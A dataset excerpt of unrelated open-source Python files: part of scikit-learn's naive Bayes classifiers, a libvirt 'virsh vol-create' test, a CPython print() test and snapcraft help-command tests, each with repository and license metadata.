        # be called by the user explicitly just once after several consecutive
        # calls to partial_fit and prior any call to predict[_[log_]proba]
        # to avoid computing the smooth log probas at each call to partial fit
        self._update_feature_log_prob()
        self._update_class_log_prior(class_prior=class_prior)
        return self
    def fit(self, X, y, sample_weight=None):
        """Fit Naive Bayes classifier according to X, y
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = [n_samples, n_features]
            Training vectors, where n_samples is the number of samples and
            n_features is the number of features.
        y : array-like, shape = [n_samples]
            Target values.
        sample_weight : array-like, shape = [n_samples], optional
            Weights applied to individual samples (1. for unweighted).
        Returns
        -------
        self : object
            Returns self.
        """
        X, y = check_X_y(X, y, 'csr')
        _, n_features = X.shape
        labelbin = LabelBinarizer()
        Y = labelbin.fit_transform(y)
        self.classes_ = labelbin.classes_
        if Y.shape[1] == 1:
            # Binary problem: expand to explicit (negative, positive) columns.
            Y = np.concatenate((1 - Y, Y), axis=1)
        # LabelBinarizer().fit_transform() returns arrays with dtype=np.int64.
        # We convert it to np.float64 to support sample_weight consistently;
        # this means we also don't have to cast X to floating point
        Y = Y.astype(np.float64)
        if sample_weight is not None:
            sample_weight = np.atleast_2d(sample_weight)
            Y *= check_array(sample_weight).T
        class_prior = self.class_prior
        # Count raw events from data before updating the class log prior
        # and feature log probas
        n_effective_classes = Y.shape[1]
        self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
        self.feature_count_ = np.zeros((n_effective_classes, n_features),
                                       dtype=np.float64)
        self._count(X, Y)
        self._update_feature_log_prob()
        self._update_class_log_prior(class_prior=class_prior)
        return self
    # XXX The following is a stopgap measure; we need to set the dimensions
    # of class_log_prior_ and feature_log_prob_ correctly.
    def _get_coef(self):
        # In the binary case only the positive-class row is exposed, so the
        # discrete NB models present a linear-model-like interface.
        return (self.feature_log_prob_[1:]
                if len(self.classes_) == 2 else self.feature_log_prob_)
    def _get_intercept(self):
        return (self.class_log_prior_[1:]
                if len(self.classes_) == 2 else self.class_log_prior_)
    coef_ = property(_get_coef)
    intercept_ = property(_get_intercept)
class MultinomialNB(BaseDiscreteNB):
    """
    Naive Bayes classifier for multinomial models
    The multinomial Naive Bayes classifier is suitable for classification with
    discrete features (e.g., word counts for text classification). The
    multinomial distribution normally requires integer feature counts. However,
    in practice, fractional counts such as tf-idf may also work.
    Read more in the :ref:`User Guide <multinomial_naive_bayes>`.
    Parameters
    ----------
    alpha : float, optional (default=1.0)
        Additive (Laplace/Lidstone) smoothing parameter
        (0 for no smoothing).
    fit_prior : boolean
        Whether to learn class prior probabilities or not.
        If false, a uniform prior will be used.
    class_prior : array-like, size (n_classes,)
        Prior probabilities of the classes. If specified the priors are not
        adjusted according to the data.
    Attributes
    ----------
    class_log_prior_ : array, shape (n_classes, )
        Smoothed empirical log probability for each class.
    intercept_ : property
        Mirrors ``class_log_prior_`` for interpreting MultinomialNB
        as a linear model.
    feature_log_prob_ : array, shape (n_classes, n_features)
        Empirical log probability of features
        given a class, ``P(x_i|y)``.
    coef_ : property
        Mirrors ``feature_log_prob_`` for interpreting MultinomialNB
        as a linear model.
    class_count_ : array, shape (n_classes,)
        Number of samples encountered for each class during fitting. This
        value is weighted by the sample weight when provided.
    feature_count_ : array, shape (n_classes, n_features)
        Number of samples encountered for each (class, feature)
        during fitting. This value is weighted by the sample weight when
        provided.
    Examples
    --------
    >>> import numpy as np
    >>> X = np.random.randint(5, size=(6, 100))
    >>> y = np.array([1, 2, 3, 4, 5, 6])
    >>> from sklearn.naive_bayes import MultinomialNB
    >>> clf = MultinomialNB()
    >>> clf.fit(X, y)
    MultinomialNB(alpha=1.0, class_prior=None, fit_prior=True)
    >>> print(clf.predict(X[2:3]))
    [3]
    Notes
    -----
    For the rationale behind the names `coef_` and `intercept_`, i.e.
    naive Bayes as a linear classifier, see J. Rennie et al. (2003),
    Tackling the poor assumptions of naive Bayes text classifiers, ICML.
    References
    ----------
    C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
    Information Retrieval. Cambridge University Press, pp. 234-265.
    http://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html
    """
    def __init__(self, alpha=1.0, fit_prior=True, class_prior=None):
        self.alpha = alpha
        self.fit_prior = fit_prior
        self.class_prior = class_prior
    def _count(self, X, Y):
        """Count and smooth feature occurrences."""
        # Multinomial counts must be non-negative (counts / tf-idf weights).
        if np.any((X.data if issparse(X) else X) < 0):
            raise ValueError("Input X must be non-negative")
        # Y.T @ X accumulates per-class feature totals in one product.
        self.feature_count_ += safe_sparse_dot(Y.T, X)
        self.class_count_ += Y.sum(axis=0)
    def _update_feature_log_prob(self):
        """Apply smoothing to raw counts and recompute log probabilities"""
        # Additive (Laplace/Lidstone) smoothing with self.alpha, then
        # normalize per class in log space.
        smoothed_fc = self.feature_count_ + self.alpha
        smoothed_cc = smoothed_fc.sum(axis=1)
        self.feature_log_prob_ = (np.log(smoothed_fc)
                                  - np.log(smoothed_cc.reshape(-1, 1)))
    def _joint_log_likelihood(self, X):
        """Calculate the posterior log probability of the samples X"""
        check_is_fitted(self, "classes_")
        X = check_array(X, accept_sparse='csr')
        # Linear in X: X @ log P(x_i|y).T + log P(y).
        return (safe_sparse_dot(X, self.feature_log_prob_.T)
                + self.class_log_prior_)
class BernoulliNB(BaseDiscreteNB):
    """Naive Bayes classifier for multivariate Bernoulli models.
    Like MultinomialNB, this classifier is suitable for discrete data. The
    difference is that while MultinomialNB works with occurrence counts,
    BernoulliNB is designed for binary/boolean features.
    Read more in the :ref:`User Guide <bernoulli_naive_bayes>`.
    Parameters
    ----------
    alpha : float, optional (default=1.0)
        Additive (Laplace/Lidstone) smoothing parameter
        (0 for no smoothing).
    binarize : float or None, optional
        Threshold for binarizing (mapping to booleans) of sample features.
        If None, input is presumed to already consist of binary vectors.
    fit_prior : boolean
        Whether to learn class prior probabilities or not.
        If false, a uniform prior will be used.
    class_prior : array-like, size=[n_classes,]
        Prior probabilities of the classes. If specified the priors are not
        adjusted according to the data.
    Attributes
    ----------
    class_log_prior_ : array, shape = [n_classes]
        Log probability of each class (smoothed).
    feature_log_prob_ : array, shape = [n_classes, n_features]
        Empirical log probability of features given a class, P(x_i|y).
    class_count_ : array, shape = [n_classes]
        Number of samples encountered for each class during fitting. This
        value is weighted by the sample weight when provided.
    feature_count_ : array, shape = [n_classes, n_features]
        Number of samples encountered for each (class, feature)
        during fitting. This value is weighted by the sample weight when
        provided.
    Examples
    --------
    >>> import numpy as np
    >>> X = np.random.randint(2, size=(6, 100))
    >>> Y = np.array([1, 2, 3, 4, 4, 5])
    >>> from sklearn.naive_bayes import BernoulliNB
    >>> clf = BernoulliNB()
    >>> clf.fit(X, Y)
    BernoulliNB(alpha=1.0, binarize=0.0, class_prior=None, fit_prior=True)
    >>> print(clf.predict(X[2:3]))
    [3]
    References
    ----------
    C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
    Information Retrieval. Cambridge University Press, pp. 234-265.
    http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
    A. McCallum and K. Nigam (1998). A comparison of event models for naive
    Bayes text classification. Proc. AAAI/ICML-98 Workshop on Learning for
    Text Categorization, pp. 41-48.
    V. Metsis, I. Androutsopoulos and G. Paliouras (2006). Spam filtering with
    naive Bayes -- Which naive Bayes? 3rd Conf. on Email and Anti-Spam (CEAS).
    """
    def __init__(self, alpha=1.0, binarize=.0, fit_prior=True,
                 class_prior=None):
        self.alpha = alpha
        self.binarize = binarize
        self.fit_prior = fit_prior
        self.class_prior = class_prior
    def _count(self, X, Y):
        """Count and smooth feature occurrences."""
        # Map features to booleans first so the counts are occurrence counts.
        if self.binarize is not None:
            X = binarize(X, threshold=self.binarize)
        self.feature_count_ += safe_sparse_dot(Y.T, X)
        self.class_count_ += Y.sum(axis=0)
    def _update_feature_log_prob(self):
        """Apply smoothing to raw counts and recompute log probabilities"""
        # Bernoulli smoothing: alpha on the feature count, 2*alpha on the
        # class count (one pseudo-count per feature outcome).
        smoothed_fc = self.feature_count_ + self.alpha
        smoothed_cc = self.class_count_ + self.alpha * 2
        self.feature_log_prob_ = (np.log(smoothed_fc)
                                  - np.log(smoothed_cc.reshape(-1, 1)))
    def _joint_log_likelihood(self, X):
        """Calculate the posterior log probability of the samples X"""
        check_is_fitted(self, "classes_")
        X = check_array(X, accept_sparse='csr')
        # Apply the same binarization used during fitting.
        if self.binarize is not None:
            X = binarize(X, threshold=self.binarize)
        n_classes, n_features = self.feature_log_prob_.shape
        n_samples, n_features_X = X.shape
        if n_features_X != n_features:
            raise ValueError("Expected input with %d features, got %d instead"
                             % (n_features, n_features_X))
        # Log probability of each feature being absent, per class.
        neg_prob = np.log(1 - np.exp(self.feature_log_prob_))
        # Compute neg_prob · (1 - X).T as ∑neg_prob - X · neg_prob
        jll = safe_sparse_dot(X, (self.feature_log_prob_ - neg_prob).T)
        jll += self.class_log_prior_ + neg_prob.sum(axis=1)
        return jll
| bsd-3-clause |
PandaWei/tp-libvirt | libvirt/tests/src/virsh_cmd/volume/virsh_vol_create.py | 1 | 6363 | import os
import logging
from virttest import virsh, libvirt_storage, libvirt_xml
from virttest.utils_test import libvirt as utlv
from autotest.client.shared import error
from autotest.client import utils
from provider import libvirt_version
def run(test, params, env):
    """
    Test virsh vol-create command to cover the following matrix:
    pool_type = [dir, fs, netfs]
    volume_format = [raw, bochs, cloop, cow, dmg, iso, qcow, qcow2, qed,
                     vmdk, vpc]
    pool_type = [disk]
    volume_format = [none, linux, fat16, fat32, linux-swap, linux-lvm,
                     linux-raid, extended]
    pool_type = [logical]
    volume_format = [none]
    pool_type = [iscsi, scsi]
    Not supported with format type
    TODO:
    pool_type = [rbd, glusterfs]
    Reference: http://www.libvirt.org/storage.html
    """
    src_pool_type = params.get("src_pool_type")
    src_pool_target = params.get("src_pool_target")
    src_emulated_image = params.get("src_emulated_image")
    extra_option = params.get("extra_option", "")
    vol_name = params.get("vol_name", "vol_create_test")
    vol_format = params.get("vol_format")
    lazy_refcounts = "yes" == params.get("lazy_refcounts")
    status_error = "yes" == params.get("status_error", "no")
    # Set volume xml attribute dictionary, extract all params start with 'vol_'
    # which are for setting volume xml, except 'lazy_refcounts'.
    vol_arg = {}
    for key in params.keys():
        if key.startswith('vol_'):
            # Numeric volume attributes are converted to int; the rest are
            # kept as strings for the XML builder.
            if key[4:] in ['capacity', 'allocation', 'owner', 'group']:
                vol_arg[key[4:]] = int(params[key])
            else:
                vol_arg[key[4:]] = params[key]
    vol_arg['lazy_refcounts'] = lazy_refcounts
    pool_type = ['dir', 'disk', 'fs', 'logical', 'netfs', 'iscsi', 'scsi']
    if src_pool_type not in pool_type:
        raise error.TestNAError("pool type %s not in supported type list: %s" %
                                (src_pool_type, pool_type))
    # --prealloc-metadata requires libvirt >= 1.0.0; skip otherwise.
    if not libvirt_version.version_compare(1, 0, 0):
        if "--prealloc-metadata" in extra_option:
            raise error.TestNAError("metadata preallocation not supported in"
                                    + " current libvirt version.")
    # libvirt acl polkit related params
    uri = params.get("virsh_uri")
    unprivileged_user = params.get('unprivileged_user')
    if unprivileged_user:
        if unprivileged_user.count('EXAMPLE'):
            unprivileged_user = 'testacl'
    # API ACL (polkit) testing requires libvirt >= 1.1.1; skip otherwise.
    if not libvirt_version.version_compare(1, 1, 1):
        if params.get('setup_libvirt_polkit') == 'yes':
            raise error.TestNAError("API acl test not supported in current"
                                    + " libvirt version.")
    try:
        # Create the src pool
        src_pool_name = "virt-%s-pool" % src_pool_type
        pvt = utlv.PoolVolumeTest(test, params)
        pvt.pre_pool(src_pool_name, src_pool_type, src_pool_target,
                     src_emulated_image, image_size="2G",
                     pre_disk_vol=["1M"])
        # Print current pools for debugging
        logging.debug("Current pools:%s",
                      libvirt_storage.StoragePool().list_pools())
        # Set volume xml file
        volxml = libvirt_xml.VolXML()
        newvol = volxml.new_vol(**vol_arg)
        vol_xml = newvol['xml']
        # The unprivileged polkit user must be able to read the XML file.
        if params.get('setup_libvirt_polkit') == 'yes':
            utils.run("chmod 666 %s" % vol_xml, ignore_status=True)
        # Run virsh_vol_create to create vol
        logging.debug("create volume from xml: %s" % newvol.xmltreefile)
        cmd_result = virsh.vol_create(src_pool_name, vol_xml, extra_option,
                                      unprivileged_user=unprivileged_user,
                                      uri=uri, ignore_status=True, debug=True)
        status = cmd_result.exit_status
        # Check result
        if not status_error:
            if not status:
                # Success path: the volume must exist in the pool and its
                # dumped XML must carry the requested format.
                src_pv = libvirt_storage.PoolVolume(src_pool_name)
                src_volumes = src_pv.list_volumes().keys()
                logging.debug("Current volumes in %s: %s",
                              src_pool_name, src_volumes)
                if vol_name not in src_volumes:
                    raise error.TestFail("Can't find volume: %s from pool: %s"
                                         % (vol_name, src_pool_name))
                # check format in volume xml
                post_xml = volxml.new_from_vol_dumpxml(vol_name, src_pool_name)
                logging.debug("the created volume xml is: %s" %
                              post_xml.xmltreefile)
                if 'format' in post_xml.keys():
                    if post_xml.format != vol_format:
                        raise error.TestFail("Volume format %s is not expected"
                                             % vol_format + " as defined.")
            else:
                # Skip the format not supported by qemu-img error
                if vol_format:
                    fmt_err = "Unknown file format '%s'" % vol_format
                    fmt_err1 = "Formatting or formatting option not "
                    fmt_err1 += "supported for file format '%s'" % vol_format
                    fmt_err2 = "Driver '%s' does not support " % vol_format
                    fmt_err2 += "image creation"
                    if "qemu-img" in cmd_result.stderr:
                        er = cmd_result.stderr
                        if fmt_err in er or fmt_err1 in er or fmt_err2 in er:
                            err_msg = "Volume format '%s' is not" % vol_format
                            err_msg += " supported by qemu-img."
                            raise error.TestNAError(err_msg)
                    else:
                        raise error.TestFail("Run failed with right command.")
                else:
                    raise error.TestFail("Run failed with right command.")
        else:
            # Negative test: the command is expected to fail.
            if status:
                logging.debug("Expect error: %s", cmd_result.stderr)
            else:
                raise error.TestFail("Expect fail, but run successfully!")
    finally:
        # Cleanup
        try:
            pvt.cleanup_pool(src_pool_name, src_pool_type, src_pool_target,
                             src_emulated_image)
        except error.TestFail, detail:
            logging.error(str(detail))
| gpl-2.0 |
mancoast/CPythonPyc_test | fail/330_test_print.py | 34 | 4682 | """Test correct operation of the print function.
"""
# In 2.6, this gives us the behavior we want. In 3.0, it has
# no function, but it still must parse correctly.
from __future__ import print_function
import unittest
from test import support
try:
# 3.x
from io import StringIO
except ImportError:
# 2.x
from StringIO import StringIO
NotDefined = object()

# Dispatch table for all 8 combinations of explicitly providing
# sep, end, and file to print().  Each entry forwards only the keyword
# arguments selected for that combination, so the tests exercise genuine
# argument omission instead of merely passing the default values.


def _make_print_caller(use_sep, use_end, use_file):
    """Build a caller that passes exactly the chosen keywords to print()."""
    def _caller(args, sep, end, file):
        kwargs = {}
        if use_sep:
            kwargs['sep'] = sep
        if use_end:
            kwargs['end'] = end
        if use_file:
            kwargs['file'] = file
        print(*args, **kwargs)
    return _caller


dispatch = {
    (use_sep, use_end, use_file): _make_print_caller(use_sep, use_end, use_file)
    for use_sep in (False, True)
    for use_end in (False, True)
    for use_file in (False, True)
}
# Helper class used to test how print() invokes __str__ on its arguments.
class ClassWith__str__:
    """Wrap a value; str(instance) returns that value verbatim."""

    def __init__(self, x):
        # Stored unchanged; returned as-is by __str__.
        self.x = x

    def __str__(self):
        return self.x
class TestPrint(unittest.TestCase):
    """Exercise the builtin print() across every combination of its
    sep/end/file keyword arguments, plus the flush flag."""

    def check(self, expected, args,
              sep=NotDefined, end=NotDefined, file=NotDefined):
        """Call print(*args), passing only the keywords that are defined,
        and assert that the captured stdout equals *expected*."""
        # Capture sys.stdout in a StringIO. Call print with args,
        # and with sep, end, and file, if they're defined. Result
        # must match expected.
        # Look up the actual function to call, based on if sep, end, and file
        # are defined
        fn = dispatch[(sep is not NotDefined,
                       end is not NotDefined,
                       file is not NotDefined)]
        with support.captured_stdout() as t:
            fn(args, sep, end, file)
        self.assertEqual(t.getvalue(), expected)

    def test_print(self):
        """Matrix of argument/sep/end combinations, run both against
        sys.stdout and against an explicit file object."""
        def x(expected, args, sep=NotDefined, end=NotDefined):
            # Run the test 2 ways: not using file, and using
            # file directed to a StringIO
            self.check(expected, args, sep=sep, end=end)
            # When writing to a file, stdout is expected to be empty
            o = StringIO()
            self.check('', args, sep=sep, end=end, file=o)
            # And o will contain the expected output
            self.assertEqual(o.getvalue(), expected)
        x('\n', ())
        x('a\n', ('a',))
        x('None\n', (None,))
        x('1 2\n', (1, 2))
        x('1 2\n', (1, ' ', 2))
        x('1*2\n', (1, 2), sep='*')
        x('1 s', (1, 's'), end='')
        x('a\nb\n', ('a', 'b'), sep='\n')
        x('1.01', (1.0, 1), sep='', end='')
        x('1*a*1.3+', (1, 'a', 1.3), sep='*', end='+')
        x('a\n\nb\n', ('a\n', 'b'), sep='\n')
        x('\0+ +\0\n', ('\0', ' ', '\0'), sep='+')
        # sep=None / end=None must behave like the defaults (' ' and '\n').
        x('a\n b\n', ('a\n', 'b'))
        x('a\n b\n', ('a\n', 'b'), sep=None)
        x('a\n b\n', ('a\n', 'b'), end=None)
        x('a\n b\n', ('a\n', 'b'), sep=None, end=None)
        # Objects are converted via __str__.
        x('*\n', (ClassWith__str__('*'),))
        x('abc 1\n', (ClassWith__str__('abc'), 1))
        # # 2.x unicode tests
        # x(u'1 2\n', ('1', u'2'))
        # x(u'u\1234\n', (u'u\1234',))
        # x(u' abc 1\n', (' ', ClassWith__str__(u'abc'), 1))
        # errors
        self.assertRaises(TypeError, print, '', sep=3)
        self.assertRaises(TypeError, print, '', end=3)
        self.assertRaises(AttributeError, print, '', file='')

    def test_print_flush(self):
        """flush=True must call file.flush() once per print call; exceptions
        raised by flush() must propagate to the caller."""
        # operation of the flush flag
        class filelike():
            # Minimal writable object recording writes and flush count.
            def __init__(self):
                self.written = ''
                self.flushed = 0
            def write(self, str):
                self.written += str
            def flush(self):
                self.flushed += 1
        f = filelike()
        print(1, file=f, end='', flush=True)
        print(2, file=f, end='', flush=True)
        print(3, file=f, flush=False)
        self.assertEqual(f.written, '123\n')
        self.assertEqual(f.flushed, 2)
        # ensure exceptions from flush are passed through
        class noflush():
            def write(self, str):
                pass
            def flush(self):
                raise RuntimeError
        self.assertRaises(RuntimeError, print, 1, file=noflush(), flush=True)
def test_main():
    """Entry point used by the CPython regression-test framework."""
    support.run_unittest(TestPrint)

if __name__ == "__main__":
    # Allow running this test file directly: python test_print.py
    test_main()
| gpl-3.0 |
jocave/snapcraft | snapcraft/tests/test_commands_help.py | 2 | 5384 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import io
import pydoc
from unittest import mock
import fixtures
from snapcraft._help import _TOPICS
from snapcraft.main import main
from snapcraft import tests
class HelpCommandTestCase(tests.TestCase):
    """Tests for `snapcraft help <topic-or-plugin>`, driven through main()
    with sys.stdout captured via mock."""

    def setUp(self):
        super().setUp()
        # pydoc pager guess can fail, for tests we want a plain pager
        # anyway
        p = mock.patch('pydoc.pager', new=pydoc.plainpager)
        p.start()
        self.addCleanup(p.stop)

    def test_topic_and_plugin_not_found_exits_with_tip(self):
        """An unknown help target exits with code 1 and logs a hint."""
        fake_logger = fixtures.FakeLogger(level=logging.ERROR)
        self.useFixture(fake_logger)
        with self.assertRaises(SystemExit) as raised:
            main(['help', 'does-not-exist'])
        self.assertEqual(1, raised.exception.code)
        self.assertEqual(
            fake_logger.output,
            'The plugin does not exist. Run `snapcraft '
            'list-plugins` to see the available plugins.\n')

    @mock.patch('sys.stdout', new_callable=io.StringIO)
    def test_print_module_help_when_no_help_for_valid_plugin(
            self, mock_stdout):
        # 'jdk' is presumably a plugin without a module docstring —
        # NOTE(review): depends on the snapcraft.plugins package contents.
        main(['help', 'jdk'])
        self.assertEqual('The plugin has no documentation\n',
                         mock_stdout.getvalue())

    @mock.patch('sys.stdout', new_callable=io.StringIO)
    def test_print_module_help_for_valid_plugin(self, mock_stdout):
        """Plugin help output starts with the plugin's docstring."""
        main(['help', 'nil'])
        expected = 'The nil plugin is'
        output = mock_stdout.getvalue()[:len(expected)]
        self.assertEqual(output, expected,
                         'The help message does not start with {!r} but with '
                         '{!r} instead'.format(expected, output))

    @mock.patch('sys.stdout', new_callable=io.StringIO)
    def test_show_module_help_with_devel_for_valid_plugin(self, mock_stdout):
        """--devel switches to pydoc-style module help for plugins."""
        main(['help', 'nil', '--devel'])
        expected = 'Help on module snapcraft.plugins.nil in snapcraft.plugins'
        output = mock_stdout.getvalue()[:len(expected)]
        self.assertEqual(output, expected,
                         'The help message does not start with {!r} but with '
                         '{!r} instead'.format(expected, output))

    @mock.patch('sys.stdout', new_callable=io.StringIO)
    def test_print_topics(self, mock_stdout):
        """`help topics` lists every key in _TOPICS, one per line."""
        main(['help', 'topics'])
        output = mock_stdout.getvalue().strip().split('\n')
        for t in _TOPICS:
            self.assertTrue(
                t in output, 'Missing topic: {!r} in {!r}'.format(t, output))

    @mock.patch('sys.stdout', new_callable=io.StringIO)
    def test_print_topic_help_for_valid_topic(self, mock_stdout):
        """Topic help output starts with the topic's summary line."""
        main(['help', 'sources'])
        expected = "Common 'source' options."
        output = mock_stdout.getvalue()[:len(expected)]
        self.assertEqual(output, expected,
                         'The help message does not start with {!r} but with '
                         '{!r} instead'.format(expected, output))

    @mock.patch('sys.stdout', new_callable=io.StringIO)
    def test_print_topic_help_with_devel_for_valid_topic(self, mock_stdout):
        """--devel yields pydoc module/package help for every topic."""
        expected = {
            'sources': 'Help on module snapcraft',
            'plugins': 'Help on package snapcraft',
        }
        for key in _TOPICS:
            # Reset the captured stream between subtests.
            mock_stdout.truncate(0)
            mock_stdout.seek(0)
            with self.subTest(key=key):
                main(['help', key, '--devel'])
                output = mock_stdout.getvalue()[:len(expected[key])]
                self.assertEqual(
                    output, expected[key],
                    'The help message does not start with {!r} but with '
                    '{!r} instead'.format(expected[key], output))

    @mock.patch('sys.stdout', new_callable=io.StringIO)
    def test_no_unicode_in_help_strings(self, mock_stdout):
        """All help text (topics and plugins) must be pure ASCII."""
        helps = ['topics']
        for key in _TOPICS.keys():
            helps.append(str(key))
        # Get a list of plugins
        import snapcraft.plugins
        import os
        from pathlib import Path
        # Every non-private .py file under snapcraft.plugins counts as a
        # plugin whose help output we exercise.
        for plugin in Path(snapcraft.plugins.__path__[0]).glob('*.py'):
            if (os.path.isfile(str(plugin)) and
                    not os.path.basename(str(plugin)).startswith('_')):
                helps.append(os.path.basename(str(plugin)[:-3]))
        for key in helps:
            mock_stdout.truncate(0)
            mock_stdout.seek(0)
            with self.subTest(key=key):
                main(['help', key])
                try:
                    mock_stdout.getvalue().encode('ascii')
                except UnicodeEncodeError:
                    self.fail('Non-ASCII characters in help text for '
                              '{!r}'.format(key))
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.